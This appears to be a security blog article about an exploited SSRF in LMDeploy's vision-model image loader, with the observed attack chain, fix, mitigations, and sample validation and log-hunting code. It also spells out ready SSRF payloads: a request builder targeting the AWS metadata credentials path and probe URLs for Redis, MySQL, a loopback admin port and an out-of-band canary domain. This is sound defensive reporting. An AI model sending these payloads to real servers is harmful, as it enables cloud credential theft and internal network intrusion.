A high-severity SSRF in LMDeploy — the Shanghai AI Laboratory toolkit that compresses, deploys, and serves large language and vision-language models behind an OpenAI-compatible API — was exploited in the wild 12 hours and 31 minutes after the GitHub advisory went live, with no public proof-of-concept available. Cloud security firm Sysdig captured the entire eight-minute attack chain on a honeypot, including a successful AWS Instance Metadata Service (IMDS) credential pull. If you’re running an LMDeploy server on a GPU instance with an IAM role attached, assume hostile traffic is already probing it.

What happened

CVE-2026-33626 is a Server-Side Request Forgery vulnerability (CVSS 7.5) in the image-loading path used by LMDeploy’s vision-language model (VLM) endpoints. The function that loads an image referenced in an inference request accepts an arbitrary URL and fetches it server-side without validating hostnames, IP ranges, or URL schemes. That turns the model server into a generic HTTP request proxy reachable from the internet.
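In an OpenAI-compatible VLM request, the image arrives as a URL inside the message content, and that URL is what the server fetches. A minimal sketch of the trigger, assuming only the standard OpenAI chat-completions field layout (the model name and prompt are illustrative, and the exact parameter LMDeploy parses is the one named in the advisory, not reproduced here):

```python
# Hypothetical sketch of the SSRF trigger: an OpenAI-style chat body whose
# "image_url" the server fetches server-side. Model name is a placeholder.
import json

def vlm_request_body(image_url: str) -> str:
    body = {
        "model": "some-served-vlm",  # illustrative, not a real model name
        "messages": [{
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this image."},
                {"type": "image_url", "image_url": {"url": image_url}},
            ],
        }],
    }
    return json.dumps(body)

# Instead of a real image, an attacker supplies an internal address:
payload = vlm_request_body(
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/")
```

The server, not the client, resolves and fetches that URL; that is the entire vulnerability.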

The advisory landed on GitHub on April 21, 2026. At 03:35 UTC on April 22, Sysdig’s honeypot logged the first exploitation attempt, originating from 103.116.72.119 (Prime Security Corp., Kowloon Bay, HK). Twelve hours and thirty-one minutes from advisory to first hit. There was no PoC published — the advisory text named the affected file, the vulnerable parameter, and the missing validation, and that was apparently enough.

The attack chain

Over an eight-minute session, the attacker walked the vision-language image loader through a textbook internal port scan:

  1. AWS Instance Metadata Service at 169.254.169.254 — pull IAM credentials attached to the GPU instance.
  2. Redis at 127.0.0.1:6379 — confirm open port, ready for cache poisoning or further pivoting.
  3. MySQL on localhost — port confirmed.
  4. A secondary HTTP administrative interface on the loopback.
  5. An out-of-band DNS exfiltration endpoint to confirm two-way reachability.
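Expressed as the URLs fed through the image loader, one request at a time (the ports for steps 3 and 4 and the out-of-band domain below are placeholders, not the observed values, which are in Sysdig's IOCs):

```python
# The five probes above as image-URL payloads. The admin-interface port and
# the OOB domain are assumed placeholders, not values from the honeypot logs.
PROBES = [
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",  # 1. IMDS
    "http://127.0.0.1:6379/",            # 2. Redis
    "http://127.0.0.1:3306/",            # 3. MySQL default port
    "http://127.0.0.1:8080/",            # 4. loopback admin interface (port assumed)
    "http://probe-id.oob.example.net/",  # 5. out-of-band DNS canary (placeholder)
]
```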

That sequence — IMDS first, then internal services — is the AWS SSRF playbook from a five-year-old training deck. What’s new is the target: VLM inference nodes typically run on GPU instances with broad IAM roles so they can pull model weights and training artifacts from S3. One successful IMDS fetch and the attacker has credentials with read access to your model bucket and, depending on your role policy, much more.

Affected versions and the fix

All LMDeploy versions prior to 0.12.3 are affected. The fix in 0.12.3 enforces hostname and IP-range validation in the image-loader path and rejects schemes other than http and https.
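The shape of that check, sketched below as an illustration of the class of validation described; this is not the actual patch code:

```python
# Sketch of the validation class the fix enforces: allow only http/https,
# resolve the host, and reject loopback, link-local (incl. 169.254.169.254),
# private, and reserved ranges. Assumption: not LMDeploy's actual patch.
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_image_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_loopback or ip.is_link_local or ip.is_private or ip.is_reserved:
            return False
    return True
```

Note that resolve-then-fetch checks like this one remain exposed to DNS rebinding unless the fetch pins the validated IP; robust implementations validate the address they actually connect to.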

There is no workaround that doesn’t gut the VLM functionality. If you’re running a vulnerable version and can’t update right now, the only useful mitigations are external:

  • IMDSv2-only on every EC2 instance running an inference workload. IMDSv2 requires a session token obtained via a PUT request (and the token response defaults to a hop limit of 1, so it cannot travel beyond the instance), which an SSRF primitive that can only issue simple GETs cannot satisfy. This single setting would have neutralized the IMDS leg of the observed attack chain.
  • Egress filtering on the inference subnet — block outbound to 169.254.169.254, RFC1918 ranges, and your own loopback from the application container.
  • Tight IAM roles. The model server needs s3:GetObject on a specific bucket prefix, not s3:* on *.
  • Network policies in Kubernetes that prevent pod-to-pod traffic from the inference deployment to anything other than its known dependencies.
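The IMDSv2 point is worth seeing concretely. Here is the documented token handshake, sketched with the stdlib, that a GET-only SSRF cannot perform:

```python
# Why IMDSv2 blocks a GET-only SSRF: credentials are served only to requests
# carrying a session token, and the token itself comes from a PUT with a TTL
# header. An image loader that just GETs a URL can produce neither.
import urllib.request

IMDS = "http://169.254.169.254"

def imdsv2_token_request() -> urllib.request.Request:
    # Step 1: obtain a session token. PUT only; the token response also
    # defaults to a hop limit of 1, so it dies beyond the instance itself.
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
    )

def imdsv2_credentials_request(role: str, token: str) -> urllib.request.Request:
    # Step 2: present the token on the credentials read.
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/iam/security-credentials/{role}",
        headers={"X-aws-ec2-metadata-token": token},
    )
```

Enforcing this is a per-instance metadata-options setting (tokens required); once it is on, the bare GET to 169.254.169.254 that the honeypot logged gets a 401 instead of credentials.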

Why this one matters

This isn’t notable because the bug is exotic — it’s a textbook SSRF in a function that takes a URL and fetches it. It’s notable because of what’s at the other end of the SSRF. The AI-infrastructure stack — inference servers, model gateways, agent orchestration tooling — is being deployed on the most permissive cloud configurations many organizations have ever stood up. GPU spend is high enough that operations teams skip the hardening pass to get capacity online; IAM roles are broad because nobody wants to be the person who broke a $40/hour training run with a missing permission.

The 12-hour exploitation window is not because LMDeploy is uniquely exposed. It’s because LLM serving infrastructure as a category is now a high-value target with low average hardening, and attackers are watching the GitHub advisory feeds for anything that lets them in.

What to do right now

Update LMDeploy to 0.12.3 or later. If you operate any LLM or VLM inference endpoint on a cloud VM, audit it for IMDSv2 enforcement and IAM-role scope today, regardless of what software is serving the model. Check Sysdig’s writeup for IOCs if you want to hunt for the observed exploitation pattern in your own logs — the 8-minute IMDS-then-Redis-then-MySQL signature is distinctive.
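If your serving stack logs the URLs it was asked to fetch, a first pass at that hunt is mechanical. A sketch that assumes nothing about your log format beyond the URL appearing somewhere in the line (it only catches literal-IP targets; hostname-based rebinding tricks need resolution-aware tooling):

```python
# Flag log lines whose embedded URL targets loopback, link-local
# (incl. 169.254.169.254), or RFC1918 space. Assumption: the fetched URL
# appears verbatim somewhere in each log line.
import ipaddress
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"']+")

def internal_fetches(log_lines):
    for line in log_lines:
        for url in URL_RE.findall(line):
            host = urlparse(url).hostname
            try:
                ip = ipaddress.ip_address(host)
            except ValueError:
                continue  # hostname, not an IP literal; out of scope here
            if ip.is_loopback or ip.is_link_local or ip.is_private:
                yield line
                break
```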

References